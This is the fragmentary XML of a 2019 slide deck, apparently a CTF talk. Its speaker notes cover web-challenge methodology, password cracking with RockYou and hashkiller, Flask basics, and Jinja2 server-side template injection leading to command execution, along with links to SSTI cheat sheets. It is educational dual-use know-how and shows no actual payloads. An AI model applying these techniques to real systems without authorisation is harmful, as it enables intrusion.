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6" r:id="rId6"/>
    <p:sldId id="276" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="263" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="275"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p:restoredTop sz="83978"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="13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443D-6D57-1348-9982-1B2E84926C2D}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>16/03/2019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592AB1-DDA3-0F44-992A-A236A553F9A7}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1422943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Examples;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If you haven’t cracked it with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>RockYou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, then it’s probably not meant to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>bruteforced</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If you can’t crack a hash with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>hashkiller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, it’s probably shouldn’t or doesn’t need to be cracked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306193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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56962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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174353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Won’t be surprised if we see similar tasks in upcoming CTFs that include filtering and maybe some flawed input sanitising to step up the difficulty a little.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Or more of an emphasis on first having to enumerate which templating engine is being used.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4592AB1-DDA3-0F44-992A-A236A553F9A7}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86263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User-agent to Google’s web crawler</a:t>
            </a:r>
          </a:p>
          <a:p>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89084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GB" dirty="0"/>
              <a:t>Read the page source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Look at JS and other includes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Test all the inputs and functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Click every link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Inspect the traffic with burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If you are stuck, check for ”old but gold” vulnerabilities like very tampering, directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>But usually by this point you will have a “clue” or idea on how to proceed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4592AB1-DDA3-0F44-992A-A236A553F9A7}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187173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WSGI - Web server gateway interface - it describes how web servers interact with web applications. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4592AB1-DDA3-0F44-992A-A236A553F9A7}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194192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Line 1 = we are importing the libraries we need for out application. flask (lower-case f) is the framework here, while Flask (upper-case F) is a Python class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In other words, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ptorotype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> that we will be used to create our web application instance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Line 3 = Actually creates our instance - worth noting that __name__ is a special variable that gets the value  __main__ when you are executing the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Line 5-7 = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pythonhow.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/how-a-flask-app-works/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4592AB1-DDA3-0F44-992A-A236A553F9A7}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694248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GB" dirty="0"/>
              <a:t>After a bit of exploring, there wasn’t much to find and only one clear piece of functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2704761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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3848129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Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Strings of HTML either in your python code or as includes (for scalability, obviously)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In the example later you will see it in-line but this is not really practical for commercial applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Also affects other template engines like twig and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mako</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Aside from exposing application variables and secrets, we can actually get command injection (restricted only by the permissions of the local application - but a lot of the time, this is root)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4592AB1-DDA3-0F44-992A-A236A553F9A7}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235808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592AB1-DDA3-0F44-992A-A236A553F9A7}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1177922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4AC6-640B-A747-B9D3-7B47D8678D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EB2A81D-17AE-4241-8C19-31CC3BED2B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4EE198A-8628-7D44-8792-3AB7671A25E6}"/>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51FA3D54-705A-0E47-B33F-AE979E5901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7BC24B-3371-B949-8720-806A7D3E92DB}"/>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45355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59ACC-75EC-4D47-AA4E-4EF30CC2895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3D82B89-10BE-C64A-A02C-61CB2ACC61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66B590-6441-C047-BC16-7942FE243A63}"/>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2CABF51D-B8F5-5D4C-BD73-6CBD76E647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856D37-BEE3-FD48-A9EC-38004D6C29AD}"/>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1798323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23DA3B-2E83-D245-B3A3-4EE3350E56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9DA797-4559-504C-B520-B00D9DCF30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26BAC7-F53D-B248-B99A-72A451035E92}"/>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AAD826D7-2CAC-024A-AEF3-C7594E51DC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7D7CD-39F3-0443-8184-CAB4FEDEB2F9}"/>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60900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3477B-F008-6647-8DF6-CBBBC676D9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D1C157-D710-A84A-BA77-EF30BCE0E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0AF2B7-5F2E-6F44-A03B-C9A21FD688B4}"/>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F36837B0-6178-2147-AC92-3396C4A021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5E6496-6772-5C4D-AB77-299BF63854E6}"/>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336823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8DEC-3F1E-2147-8EFC-75291559A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68317F3-DAC8-7D4B-8ACA-03899A0B1A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E08CE-12EB-8B4E-8E92-4386127F305F}"/>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31E7AD30-0C1B-6F4A-B5BA-BE6B4F0C80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108692-26E9-B846-A3DC-E12C8E4BD08D}"/>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6697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753C-35EF-8F4B-968F-0E546975E8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94EB0CC-E1B1-2448-9CB4-FF56D20E2D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1C5814-BDE0-9D4D-A3CC-E6BCDCDDB7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3C83FEC-4FD1-9D41-AF74-AF419708963B}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D17367-E49D-C14E-9D5D-BACCBEE4E6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E9D4F3-BEBD-624A-85C5-4ADE9DD2CB50}"/>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256576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5A4A-61B9-AC49-9153-F40BBD3BCA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64B5D7-83C1-7847-A4F6-5C7F5CBCC3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B2377E-93B4-7046-A3E4-1DF9325ADB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477BA24-622F-E149-B008-25EF20E264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294536-4D3F-1049-8E56-1B9705E062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52B61B7-2316-8047-8C4E-54EE28B8A067}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA74B4D-0FC6-D94F-89AA-A2680FA06B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40261D-B0AD-1847-A100-620C53A335CB}"/>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369768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C6EE-C194-B64D-8C22-B188FFE3B51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6D1C4D-C67A-194F-969A-7C4004446771}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB7B7EA-DECB-F747-A947-19CFFFA9158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F908CDA-53BF-F848-A452-9DA7DFFE5835}"/>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2605172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DCD069-39BB-5242-97EE-68477D2A7ED0}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E848B7-21B0-4148-95B1-D293119E78A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335F5C-676A-B44F-953E-ECD227D674F0}"/>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3411903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A701-8920-2049-A4FE-FE45D37D6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945EDD5-766E-C840-9D20-984DAB95D4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841A08-34E3-8940-95AD-3D70892138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612BD-9AA7-5D4D-9B4F-ED92748F9122}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{685FB3DA-5721-2644-B244-965D6CA156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403C306-6476-2B48-8708-4E5AD2D335D9}"/>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1374271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462-19EE-034F-AACD-8CAB575E1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F7E8435-223D-AE40-90FF-3D87F0BCE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DE8595-66DE-EB42-BD95-D152C19A7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0F287-F483-7242-82C8-2D9C83C7E295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{65906362-4157-A446-91DA-DE9903DC63F3}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>16/03/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{244F02D9-772C-1C44-BABC-C92C6056A0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AF640B-9C79-694F-AB8C-DC08A8D9506C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7BEA196D-47C2-6D44-A872-13298963C75A}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428875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048B24-1A1A-D24D-8B35-8DD33714C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98A97-C7F7-AB43-96DF-D2B19BFA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890171-DF2C-7F49-A4F8-4F011F4DBE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906362-4157-A446-91DA-DE9903DC63F3}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>16/03/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1983D0B0-8EFF-5442-83C7-A5E6B6EF7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276E655-0463-004E-8B9E-E037756E0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A196D-47C2-6D44-A872-13298963C75A}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1531115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nvisium.com/blog/2015/12/07/injecting-flask.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equalsnp-team.github.io/cheatsheet/flask-jinja2-sst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blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.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portswigger.net/blog/server-side-template-injec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palletsprojects.com/p/jinja/" TargetMode="External"/><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deburst.io/flask-for-dummies-a-beginners-guide-to-flask-part-uno-53aec6afc5b1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wsgi.readthedocs.io/en/latest/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.palletsprojects.com/p/werkzeu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pequalsnp-team.github.io/cheatsheet/flask-jinja2-sst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7AFAD5-D930-6944-8B25-F2490A1563D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="51323"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428416" y="3958939"/>
            <a:ext cx="4375346" cy="2142122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3405A693-1418-AF46-938A-5DD428250586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="11823"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3359150" y="0"/>
            <a:ext cx="5473700" cy="1814146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A6A6A02-C4AA-CF44-9BCD-DB94905A0347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010461" y="3013753"/>
            <a:ext cx="3644777" cy="2710992"/>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FEA28B4F-B858-8746-9DF6-9073FF73C692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="48677" b="4999"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218308" y="2334208"/>
            <a:ext cx="4613164" cy="2035041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3142915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E46B-C13D-D54D-BC72-AA98D7BDBBAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A quick example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>- stolen from the internet ;)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C66F05-070C-1C47-9E9D-B3CB27F7CAA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1511300"/>
            <a:ext cx="7690853" cy="4981575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3071D44-3F58-AA42-A0A2-30C09AB37D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740288" y="5569545"/>
            <a:ext cx="3171824" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
